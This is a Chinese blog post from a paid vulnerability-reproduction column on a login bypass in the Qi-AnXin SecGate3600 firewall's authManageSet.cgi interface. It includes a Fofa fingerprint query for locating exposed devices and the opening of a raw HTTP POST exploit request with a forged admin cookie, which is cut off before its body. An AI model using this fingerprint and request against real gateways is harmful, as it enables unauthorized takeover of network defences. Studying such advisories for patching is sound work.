奇安信网神SecGate3600防火墙authManageSet.cgi接口登录绕过

今天晚上早睡觉

已于 2024-03-09 18:30:02 修改

阅读量389

点赞数

分类专栏：漏洞复现文章标签： web安全

于 2024-03-08 16:19:36 首次发布

本文链接：https://blog.csdn.net/weixin_43567873/article/details/136565342

版权

漏洞复现专栏收录该内容

364 篇文章 177 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

简介

SecGate3600是网神信息技术(北京)股份有限公司旗下一款安全网关产品

漏洞描述

网神 SecGate3600 存在登录绕过漏洞，攻击者利用该漏洞可获取管理员密码等敏感信息，进一步控制系统

影响版本

奇安信网神SecGate3600

Fofa：

body="sec_gate_image/login_02.gif"

漏洞复现

POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Cookie: sw_login_name=admin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content